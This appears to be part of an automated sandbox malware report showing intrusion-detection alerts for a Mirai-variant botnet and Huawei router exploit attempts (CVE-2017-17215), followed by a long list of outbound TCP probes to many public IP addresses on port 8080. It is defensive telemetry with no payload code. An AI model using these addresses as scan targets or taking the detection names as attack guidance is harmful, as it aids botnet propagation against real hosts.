192.168.2.2388.214.194.20635136802839471 11/22/23-08:40:21.623603	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35136	80	192.168.2.23	88.214.194.206
192.168.2.2395.173.137.5552898802839471 11/22/23-08:40:27.046260	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52898	80	192.168.2.23	95.173.137.55
192.168.2.23197.0.96.19741388372152829579 11/22/23-08:40:28.467238	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	41388	37215	192.168.2.23	197.0.96.197
192.168.2.23112.171.240.24759038802839471 11/22/23-08:38:48.247355	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59038	80	192.168.2.23	112.171.240.247
192.168.2.2395.142.154.14453376802839471 11/22/23-08:38:40.840549	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53376	80	192.168.2.23	95.142.154.144
192.168.2.23112.74.49.4158740802839471 11/22/23-08:38:18.074774	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58740	80	192.168.2.23	112.74.49.41
192.168.2.2395.163.97.12240200802839471 11/22/23-08:40:11.064618	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40200	80	192.168.2.23	95.163.97.122
192.168.2.2388.198.66.5960400802839471 11/22/23-08:40:21.711242	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60400	80	192.168.2.23	88.198.66.59
192.168.2.2395.217.222.21839440802839471 11/22/23-08:38:08.641947	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39440	80	192.168.2.23	95.217.222.218
192.168.2.2395.86.79.12840192802839471 11/22/23-08:40:00.032797	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40192	80	192.168.2.23	95.86.79.128
192.168.2.2388.87.6.4535290802839471 11/22/23-08:38:50.677174	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35290	80	192.168.2.23	88.87.6.45
192.168.2.23112.125.254.6258304802839471 11/22/23-08:38:46.219570	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58304	80	192.168.2.23	112.125.254.62
192.168.2.2395.100.219.22051054802839471 11/22/23-08:40:10.142581	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51054	80	192.168.2.23	95.100.219.220
192.168.2.2395.216.12.10338380802839471 11/22/23-08:40:04.852923	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38380	80	192.168.2.23	95.216.12.103
192.168.2.23112.3.25.4340566802839471 11/22/23-08:39:34.996356	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40566	80	192.168.2.23	112.3.25.43
192.168.2.2395.171.21.18852314802839471 11/22/23-08:39:49.702446	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52314	80	192.168.2.23	95.171.21.188
192.168.2.2395.101.179.13446408802839471 11/22/23-08:40:18.579503	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46408	80	192.168.2.23	95.101.179.134
192.168.2.2341.239.72.25041458372152829579 11/22/23-08:39:02.196658	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	41458	37215	192.168.2.23	41.239.72.250
192.168.2.2395.101.5.6433898802839471 11/22/23-08:40:04.675795	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33898	80	192.168.2.23	95.101.5.64
192.168.2.2395.226.53.13055716802839471 11/22/23-08:40:09.766199	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55716	80	192.168.2.23	95.226.53.130
192.168.2.2395.59.245.23135270802839471 11/22/23-08:40:09.791160	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35270	80	192.168.2.23	95.59.245.231
192.168.2.23112.90.180.954536802839471 11/22/23-08:40:26.547501	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54536	80	192.168.2.23	112.90.180.9
192.168.2.23112.126.78.12645206802839471 11/22/23-08:39:25.695376	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45206	80	192.168.2.23	112.126.78.126
192.168.2.23112.213.35.7937790802839471 11/22/23-08:39:39.354525	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37790	80	192.168.2.23	112.213.35.79
192.168.2.23112.46.225.20753078802839471 11/22/23-08:38:11.457411	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53078	80	192.168.2.23	112.46.225.207
192.168.2.2395.250.107.5532998802839471 11/22/23-08:39:13.989294	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32998	80	192.168.2.23	95.250.107.55
192.168.2.23197.56.98.19551374372152835222 11/22/23-08:38:35.550535	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	51374	37215	192.168.2.23	197.56.98.195
192.168.2.23112.127.81.12059622802839471 11/22/23-08:38:57.132798	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59622	80	192.168.2.23	112.127.81.120
192.168.2.2388.119.185.3235072802839471 11/22/23-08:38:13.799641	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35072	80	192.168.2.23	88.119.185.32
192.168.2.23112.78.159.1259346802839471 11/22/23-08:39:04.423434	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59346	80	192.168.2.23	112.78.159.12
192.168.2.2388.221.192.4853838802839471 11/22/23-08:38:13.781061	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53838	80	192.168.2.23	88.221.192.48
192.168.2.23112.48.136.10747026802839471 11/22/23-08:38:49.077903	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47026	80	192.168.2.23	112.48.136.107
192.168.2.23112.126.144.20755552802839471 11/22/23-08:39:16.547473	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55552	80	192.168.2.23	112.126.144.207
192.168.2.2395.101.174.1233636802839471 11/22/23-08:38:58.053804	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33636	80	192.168.2.23	95.101.174.12
192.168.2.2395.86.66.9933380802839471 11/22/23-08:39:14.001801	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33380	80	192.168.2.23	95.86.66.99
192.168.2.23112.3.25.4340570802839471 11/22/23-08:39:35.000147	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40570	80	192.168.2.23	112.3.25.43
192.168.2.2395.82.174.23351634802839471 11/22/23-08:38:24.758640	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51634	80	192.168.2.23	95.82.174.233
192.168.2.23112.12.26.23455232802839471 11/22/23-08:38:49.093468	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55232	80	192.168.2.23	112.12.26.234
192.168.2.23197.224.204.22249476372152829579 11/22/23-08:39:47.427391	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	49476	37215	192.168.2.23	197.224.204.222
192.168.2.23112.197.130.13655720802839471 11/22/23-08:39:52.524365	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55720	80	192.168.2.23	112.197.130.136
192.168.2.2388.221.179.19742598802839471 11/22/23-08:39:26.891755	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42598	80	192.168.2.23	88.221.179.197
192.168.2.2395.163.97.12240104802839471 11/22/23-08:40:09.783813	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40104	80	192.168.2.23	95.163.97.122
192.168.2.23112.126.102.8245362802839471 11/22/23-08:39:17.126730	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45362	80	192.168.2.23	112.126.102.82
192.168.2.2395.58.65.2933066802839471 11/22/23-08:39:41.213175	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33066	80	192.168.2.23	95.58.65.29
192.168.2.23112.78.213.5255400802839471 11/22/23-08:39:05.071025	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55400	80	192.168.2.23	112.78.213.52
192.168.2.2341.42.152.14033446372152835222 11/22/23-08:40:09.100084	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	33446	37215	192.168.2.23	41.42.152.140
192.168.2.23112.173.239.8647950802839471 11/22/23-08:38:13.596999	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47950	80	192.168.2.23	112.173.239.86
192.168.2.2395.101.142.6434180802839471 11/22/23-08:40:24.286995	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34180	80	192.168.2.23	95.101.142.64
192.168.2.23112.173.100.22039768802839471 11/22/23-08:38:11.976232	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39768	80	192.168.2.23	112.173.100.220
192.168.2.2395.216.87.2457626802839471 11/22/23-08:38:42.834418	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57626	80	192.168.2.23	95.216.87.24
192.168.2.2395.163.137.6051394802839471 11/22/23-08:38:19.619645	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51394	80	192.168.2.23	95.163.137.60
192.168.2.2395.101.50.11847172802839471 11/22/23-08:40:24.376457	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47172	80	192.168.2.23	95.101.50.118
192.168.2.2388.221.158.248184802839471 11/22/23-08:39:14.652864	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48184	80	192.168.2.23	88.221.158.2
192.168.2.2395.141.86.5835004802839471 11/22/23-08:40:04.684838	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35004	80	192.168.2.23	95.141.86.58
192.168.2.2388.86.221.5353120802839471 11/22/23-08:38:53.509332	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53120	80	192.168.2.23	88.86.221.53
192.168.2.2395.181.164.1233694802839471 11/22/23-08:39:54.949711	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33694	80	192.168.2.23	95.181.164.12
192.168.2.2395.140.17.1141194802839471 11/22/23-08:40:04.877720	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41194	80	192.168.2.23	95.140.17.11
192.168.2.2388.221.43.24338734802839471 11/22/23-08:40:15.862489	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38734	80	192.168.2.23	88.221.43.243
192.168.2.2395.101.214.8148812802839471 11/22/23-08:40:24.287063	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48812	80	192.168.2.23	95.101.214.81
192.168.2.2395.216.6.10043372802839471 11/22/23-08:38:07.240461	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43372	80	192.168.2.23	95.216.6.100
192.168.2.2395.100.203.7242810802839471 11/22/23-08:38:58.051198	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42810	80	192.168.2.23	95.100.203.72
192.168.2.2395.164.199.11632998802839471 11/22/23-08:39:36.508410	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32998	80	192.168.2.23	95.164.199.116
192.168.2.23112.15.4.12547648802839471 11/22/23-08:40:31.031584	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47648	80	192.168.2.23	112.15.4.125
192.168.2.23112.126.146.17256748802839471 11/22/23-08:39:53.158273	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56748	80	192.168.2.23	112.126.146.172
192.168.2.23112.172.161.12044902802839471 11/22/23-08:38:22.203059	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44902	80	192.168.2.23	112.172.161.120
192.168.2.2388.209.202.19755212802839471 11/22/23-08:39:29.996788	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55212	80	192.168.2.23	88.209.202.197
192.168.2.2395.125.131.7045292802839471 11/22/23-08:39:26.308919	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45292	80	192.168.2.23	95.125.131.70
192.168.2.23112.125.209.4447382802839471 11/22/23-08:38:20.068877	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47382	80	192.168.2.23	112.125.209.44
192.168.2.2388.176.167.18039584802839471 11/22/23-08:40:18.735553	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39584	80	192.168.2.23	88.176.167.180
192.168.2.2395.179.196.3359306802839471 11/22/23-08:38:26.756152	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59306	80	192.168.2.23	95.179.196.33
192.168.2.2395.101.4.3040656802839471 11/22/23-08:39:59.800564	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40656	80	192.168.2.23	95.101.4.30
192.168.2.23112.240.57.22460138802839471 11/22/23-08:40:14.009559	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60138	80	192.168.2.23	112.240.57.224
192.168.2.2395.101.4.19046334802839471 11/22/23-08:40:26.986183	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46334	80	192.168.2.23	95.101.4.190
192.168.2.2395.183.8.4341666802839471 11/22/23-08:39:14.126023	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41666	80	192.168.2.23	95.183.8.43
192.168.2.23112.126.158.12758440802839471 11/22/23-08:39:33.292304	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58440	80	192.168.2.23	112.126.158.127
192.168.2.23112.126.155.5447422802839471 11/22/23-08:38:12.005044	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47422	80	192.168.2.23	112.126.155.54
192.168.2.2395.0.177.10239530802839471 11/22/23-08:38:45.389535	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39530	80	192.168.2.23	95.0.177.102
192.168.2.23112.126.169.21338134802839471 11/22/23-08:39:52.840268	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38134	80	192.168.2.23	112.126.169.213
192.168.2.2388.5.23.24255316802839471 11/22/23-08:39:23.775567	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55316	80	192.168.2.23	88.5.23.242
192.168.2.23112.65.217.6251294802839471 11/22/23-08:38:49.044123	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51294	80	192.168.2.23	112.65.217.62
192.168.2.23112.126.254.1433902802839471 11/22/23-08:39:59.512208	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33902	80	192.168.2.23	112.126.254.14
192.168.2.2395.111.195.11333652802839471 11/22/23-08:40:24.427413	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33652	80	192.168.2.23	95.111.195.113
192.168.2.2388.221.129.18754376802839471 11/22/23-08:40:30.808640	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54376	80	192.168.2.23	88.221.129.187
192.168.2.23112.121.27.7649532802839471 11/22/23-08:39:08.808872	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49532	80	192.168.2.23	112.121.27.76
192.168.2.23112.161.34.13146694802839471 11/22/23-08:39:12.394616	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46694	80	192.168.2.23	112.161.34.131
192.168.2.2388.221.202.17333148802839471 11/22/23-08:40:01.772779	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33148	80	192.168.2.23	88.221.202.173
192.168.2.23112.125.166.9158408802839471 11/22/23-08:37:59.866051	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58408	80	192.168.2.23	112.125.166.91
192.168.2.2395.100.238.2148818802839471 11/22/23-08:38:42.555443	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48818	80	192.168.2.23	95.100.238.21
192.168.2.2395.100.139.7858014802839471 11/22/23-08:38:24.988517	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58014	80	192.168.2.23	95.100.139.78
192.168.2.2395.216.139.14342466802839471 11/22/23-08:38:53.104292	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42466	80	192.168.2.23	95.216.139.143
192.168.2.23112.125.187.16253566802839471 11/22/23-08:40:26.532504	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53566	80	192.168.2.23	112.125.187.162

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2023 08:37:48.398569107 CET	54329	8080	192.168.2.23	95.239.99.137
Nov 22, 2023 08:37:48.398658991 CET	54329	8080	192.168.2.23	62.197.171.136
Nov 22, 2023 08:37:48.398711920 CET	54329	8080	192.168.2.23	31.217.160.254
Nov 22, 2023 08:37:48.398772955 CET	54329	8080	192.168.2.23	94.103.225.137
Nov 22, 2023 08:37:48.398787975 CET	54329	8080	192.168.2.23	95.129.218.125
Nov 22, 2023 08:37:48.398796082 CET	54329	8080	192.168.2.23	94.118.154.0
Nov 22, 2023 08:37:48.398799896 CET	54329	8080	192.168.2.23	31.129.9.24
Nov 22, 2023 08:37:48.398813963 CET	54329	8080	192.168.2.23	62.198.188.109
Nov 22, 2023 08:37:48.398844004 CET	54329	8080	192.168.2.23	85.26.128.46
Nov 22, 2023 08:37:48.398864031 CET	54329	8080	192.168.2.23	62.214.178.227
Nov 22, 2023 08:37:48.398869991 CET	54329	8080	192.168.2.23	31.111.205.14
Nov 22, 2023 08:37:48.398888111 CET	54329	8080	192.168.2.23	94.223.9.255
Nov 22, 2023 08:37:48.398888111 CET	54329	8080	192.168.2.23	85.139.111.44
Nov 22, 2023 08:37:48.398895025 CET	54329	8080	192.168.2.23	31.201.50.201
Nov 22, 2023 08:37:48.398895025 CET	54329	8080	192.168.2.23	95.120.21.198
Nov 22, 2023 08:37:48.398914099 CET	54329	8080	192.168.2.23	31.128.195.26
Nov 22, 2023 08:37:48.398921013 CET	54329	8080	192.168.2.23	94.117.175.178
Nov 22, 2023 08:37:48.398922920 CET	54329	8080	192.168.2.23	62.143.100.116
Nov 22, 2023 08:37:48.398921013 CET	54329	8080	192.168.2.23	62.140.15.60
Nov 22, 2023 08:37:48.398933887 CET	54329	8080	192.168.2.23	62.238.117.246
Nov 22, 2023 08:37:48.398933887 CET	54329	8080	192.168.2.23	95.217.185.241
Nov 22, 2023 08:37:48.398948908 CET	54329	8080	192.168.2.23	62.69.184.152
Nov 22, 2023 08:37:48.398961067 CET	54329	8080	192.168.2.23	31.69.129.200
Nov 22, 2023 08:37:48.398962975 CET	54329	8080	192.168.2.23	85.20.6.192
Nov 22, 2023 08:37:48.398963928 CET	54329	8080	192.168.2.23	31.150.177.221
Nov 22, 2023 08:37:48.398962975 CET	54329	8080	192.168.2.23	31.88.67.209
Nov 22, 2023 08:37:48.398963928 CET	54329	8080	192.168.2.23	94.197.163.143
Nov 22, 2023 08:37:48.398988962 CET	54329	8080	192.168.2.23	95.246.6.33
Nov 22, 2023 08:37:48.398989916 CET	54329	8080	192.168.2.23	31.217.91.121
Nov 22, 2023 08:37:48.399013042 CET	54329	8080	192.168.2.23	94.77.4.16
Nov 22, 2023 08:37:48.399013042 CET	54329	8080	192.168.2.23	31.109.224.228
Nov 22, 2023 08:37:48.399022102 CET	54329	8080	192.168.2.23	31.240.31.220
Nov 22, 2023 08:37:48.399029970 CET	54329	8080	192.168.2.23	85.189.85.213
Nov 22, 2023 08:37:48.399029970 CET	54329	8080	192.168.2.23	95.183.10.1
Nov 22, 2023 08:37:48.399033070 CET	54329	8080	192.168.2.23	85.237.178.252
Nov 22, 2023 08:37:48.399041891 CET	54329	8080	192.168.2.23	31.238.209.125
Nov 22, 2023 08:37:48.399050951 CET	54329	8080	192.168.2.23	95.222.228.36
Nov 22, 2023 08:37:48.399060011 CET	54329	8080	192.168.2.23	62.168.148.202
Nov 22, 2023 08:37:48.399075985 CET	54329	8080	192.168.2.23	62.146.52.38
Nov 22, 2023 08:37:48.399075985 CET	54329	8080	192.168.2.23	85.114.63.73
Nov 22, 2023 08:37:48.399080038 CET	54329	8080	192.168.2.23	95.170.147.222
Nov 22, 2023 08:37:48.399082899 CET	54329	8080	192.168.2.23	31.232.43.79
Nov 22, 2023 08:37:48.399082899 CET	54329	8080	192.168.2.23	62.183.190.26
Nov 22, 2023 08:37:48.399091959 CET	54329	8080	192.168.2.23	85.10.24.226
Nov 22, 2023 08:37:48.399092913 CET	54329	8080	192.168.2.23	31.214.19.36
Nov 22, 2023 08:37:48.399097919 CET	54329	8080	192.168.2.23	85.184.26.188
Nov 22, 2023 08:37:48.399111986 CET	54329	8080	192.168.2.23	94.193.18.66
Nov 22, 2023 08:37:48.399113894 CET	54329	8080	192.168.2.23	95.124.177.90
Nov 22, 2023 08:37:48.399116039 CET	54329	8080	192.168.2.23	85.129.205.245
Nov 22, 2023 08:37:48.399127007 CET	54329	8080	192.168.2.23	62.92.24.63
Nov 22, 2023 08:37:48.399133921 CET	54329	8080	192.168.2.23	62.62.120.207
Nov 22, 2023 08:37:48.399133921 CET	54329	8080	192.168.2.23	95.68.3.103
Nov 22, 2023 08:37:48.399142027 CET	54329	8080	192.168.2.23	94.224.156.163
Nov 22, 2023 08:37:48.399142981 CET	54329	8080	192.168.2.23	94.31.39.90
Nov 22, 2023 08:37:48.399152040 CET	54329	8080	192.168.2.23	62.196.1.172
Nov 22, 2023 08:37:48.399167061 CET	54329	8080	192.168.2.23	94.143.92.166
Nov 22, 2023 08:37:48.399168015 CET	54329	8080	192.168.2.23	62.72.74.22
Nov 22, 2023 08:37:48.399168015 CET	54329	8080	192.168.2.23	31.20.63.164
Nov 22, 2023 08:37:48.399168015 CET	54329	8080	192.168.2.23	95.254.151.167
Nov 22, 2023 08:37:48.399168015 CET	54329	8080	192.168.2.23	62.34.188.230
Nov 22, 2023 08:37:48.399168968 CET	54329	8080	192.168.2.23	94.4.41.61
Nov 22, 2023 08:37:48.399168968 CET	54329	8080	192.168.2.23	94.8.59.210
Nov 22, 2023 08:37:48.399178982 CET	54329	8080	192.168.2.23	85.84.165.142
Nov 22, 2023 08:37:48.399190903 CET	54329	8080	192.168.2.23	62.236.52.175
Nov 22, 2023 08:37:48.399194002 CET	54329	8080	192.168.2.23	31.2.232.202
Nov 22, 2023 08:37:48.399207115 CET	54329	8080	192.168.2.23	62.245.32.222
Nov 22, 2023 08:37:48.399209976 CET	54329	8080	192.168.2.23	94.27.189.74
Nov 22, 2023 08:37:48.399210930 CET	54329	8080	192.168.2.23	85.16.137.21
Nov 22, 2023 08:37:48.399214029 CET	54329	8080	192.168.2.23	95.171.121.100
Nov 22, 2023 08:37:48.399219990 CET	54329	8080	192.168.2.23	31.169.143.96
Nov 22, 2023 08:37:48.399230003 CET	54329	8080	192.168.2.23	85.112.94.29
Nov 22, 2023 08:37:48.399236917 CET	54329	8080	192.168.2.23	31.233.70.18
Nov 22, 2023 08:37:48.399254084 CET	54329	8080	192.168.2.23	94.203.45.253
Nov 22, 2023 08:37:48.399255037 CET	54329	8080	192.168.2.23	31.196.23.123
Nov 22, 2023 08:37:48.399259090 CET	54329	8080	192.168.2.23	85.191.75.182
Nov 22, 2023 08:37:48.399266958 CET	54329	8080	192.168.2.23	94.188.130.215
Nov 22, 2023 08:37:48.399266958 CET	54329	8080	192.168.2.23	85.74.21.26
Nov 22, 2023 08:37:48.399269104 CET	54329	8080	192.168.2.23	95.2.124.113
Nov 22, 2023 08:37:48.399274111 CET	54329	8080	192.168.2.23	85.35.185.137
Nov 22, 2023 08:37:48.399276972 CET	54329	8080	192.168.2.23	94.247.246.15
Nov 22, 2023 08:37:48.399279118 CET	54329	8080	192.168.2.23	31.50.27.18
Nov 22, 2023 08:37:48.399282932 CET	54329	8080	192.168.2.23	95.81.243.49
Nov 22, 2023 08:37:48.399282932 CET	54329	8080	192.168.2.23	62.246.71.122
Nov 22, 2023 08:37:48.399307966 CET	54329	8080	192.168.2.23	85.23.43.157
Nov 22, 2023 08:37:48.399311066 CET	54329	8080	192.168.2.23	95.119.12.154
Nov 22, 2023 08:37:48.399321079 CET	54329	8080	192.168.2.23	95.216.175.47
Nov 22, 2023 08:37:48.399321079 CET	54329	8080	192.168.2.23	95.81.122.100
Nov 22, 2023 08:37:48.399322033 CET	54329	8080	192.168.2.23	85.174.233.5
Nov 22, 2023 08:37:48.399322987 CET	54329	8080	192.168.2.23	62.116.173.231
Nov 22, 2023 08:37:48.399322987 CET	54329	8080	192.168.2.23	85.254.253.176
Nov 22, 2023 08:37:48.399333000 CET	54329	8080	192.168.2.23	31.182.13.56
Nov 22, 2023 08:37:48.399333000 CET	54329	8080	192.168.2.23	94.75.60.137
Nov 22, 2023 08:37:48.399348021 CET	54329	8080	192.168.2.23	62.205.33.81
Nov 22, 2023 08:37:48.399358034 CET	54329	8080	192.168.2.23	85.248.92.148
Nov 22, 2023 08:37:48.399360895 CET	54329	8080	192.168.2.23	95.172.114.134
Nov 22, 2023 08:37:48.399369001 CET	54329	8080	192.168.2.23	31.188.71.103
Nov 22, 2023 08:37:48.399370909 CET	54329	8080	192.168.2.23	62.43.236.50
Nov 22, 2023 08:37:48.399377108 CET	54329	8080	192.168.2.23	62.7.245.108
Nov 22, 2023 08:37:48.399385929 CET	54329	8080	192.168.2.23	85.9.213.60
Nov 22, 2023 08:37:48.399399996 CET	54329	8080	192.168.2.23	85.176.30.43
Nov 22, 2023 08:37:48.399409056 CET	54329	8080	192.168.2.23	94.23.192.119
Nov 22, 2023 08:37:48.399409056 CET	54329	8080	192.168.2.23	94.73.60.224
Nov 22, 2023 08:37:48.399410963 CET	54329	8080	192.168.2.23	85.238.122.214
Nov 22, 2023 08:37:48.399435043 CET	54329	8080	192.168.2.23	95.134.99.209
Nov 22, 2023 08:37:48.399435043 CET	54329	8080	192.168.2.23	31.14.190.85
Nov 22, 2023 08:37:48.399435043 CET	54329	8080	192.168.2.23	31.78.254.210
Nov 22, 2023 08:37:48.399435997 CET	54329	8080	192.168.2.23	31.97.199.168
Nov 22, 2023 08:37:48.399446011 CET	54329	8080	192.168.2.23	62.178.43.117
Nov 22, 2023 08:37:48.399467945 CET	54329	8080	192.168.2.23	31.130.219.15
Nov 22, 2023 08:37:48.399477005 CET	54329	8080	192.168.2.23	31.251.165.135
Nov 22, 2023 08:37:48.399487019 CET	54329	8080	192.168.2.23	62.39.113.171
Nov 22, 2023 08:37:48.399487972 CET	54329	8080	192.168.2.23	31.54.4.45
Nov 22, 2023 08:37:48.399502039 CET	54329	8080	192.168.2.23	62.5.121.48
Nov 22, 2023 08:37:48.399509907 CET	54329	8080	192.168.2.23	94.36.13.125
Nov 22, 2023 08:37:48.399509907 CET	54329	8080	192.168.2.23	62.27.120.143
Nov 22, 2023 08:37:48.399512053 CET	54329	8080	192.168.2.23	62.137.13.223
Nov 22, 2023 08:37:48.399527073 CET	54329	8080	192.168.2.23	94.227.152.0
Nov 22, 2023 08:37:48.399527073 CET	54329	8080	192.168.2.23	85.73.63.192
Nov 22, 2023 08:37:48.399527073 CET	54329	8080	192.168.2.23	85.6.53.193
Nov 22, 2023 08:37:48.399535894 CET	54329	8080	192.168.2.23	85.134.81.224
Nov 22, 2023 08:37:48.399542093 CET	54329	8080	192.168.2.23	94.238.51.51
Nov 22, 2023 08:37:48.399542093 CET	54329	8080	192.168.2.23	85.214.197.79
Nov 22, 2023 08:37:48.399563074 CET	54329	8080	192.168.2.23	62.146.98.88
Nov 22, 2023 08:37:48.399563074 CET	54329	8080	192.168.2.23	31.7.104.124
Nov 22, 2023 08:37:48.399564981 CET	54329	8080	192.168.2.23	31.130.150.179
Nov 22, 2023 08:37:48.399570942 CET	54329	8080	192.168.2.23	62.130.210.211
Nov 22, 2023 08:37:48.399586916 CET	54329	8080	192.168.2.23	94.72.4.144
Nov 22, 2023 08:37:48.399590015 CET	54329	8080	192.168.2.23	62.90.122.171
Nov 22, 2023 08:37:48.399593115 CET	54329	8080	192.168.2.23	85.75.217.231
Nov 22, 2023 08:37:48.399604082 CET	54329	8080	192.168.2.23	31.50.139.127
Nov 22, 2023 08:37:48.399605036 CET	54329	8080	192.168.2.23	31.202.34.140
Nov 22, 2023 08:37:48.399616003 CET	54329	8080	192.168.2.23	31.13.4.50
Nov 22, 2023 08:37:48.399625063 CET	54329	8080	192.168.2.23	62.34.99.79
Nov 22, 2023 08:37:48.399638891 CET	54329	8080	192.168.2.23	62.21.116.109
Nov 22, 2023 08:37:48.399646044 CET	54329	8080	192.168.2.23	62.195.108.227
Nov 22, 2023 08:37:48.399647951 CET	54329	8080	192.168.2.23	94.156.82.170
Nov 22, 2023 08:37:48.399647951 CET	54329	8080	192.168.2.23	95.215.245.49
Nov 22, 2023 08:37:48.399647951 CET	54329	8080	192.168.2.23	95.223.20.9
Nov 22, 2023 08:37:48.399666071 CET	54329	8080	192.168.2.23	85.49.242.132
Nov 22, 2023 08:37:48.399672985 CET	54329	8080	192.168.2.23	85.229.76.15
Nov 22, 2023 08:37:48.399682999 CET	54329	8080	192.168.2.23	95.156.163.177
Nov 22, 2023 08:37:48.399682999 CET	54329	8080	192.168.2.23	31.62.68.171
Nov 22, 2023 08:37:48.399684906 CET	54329	8080	192.168.2.23	62.140.63.4
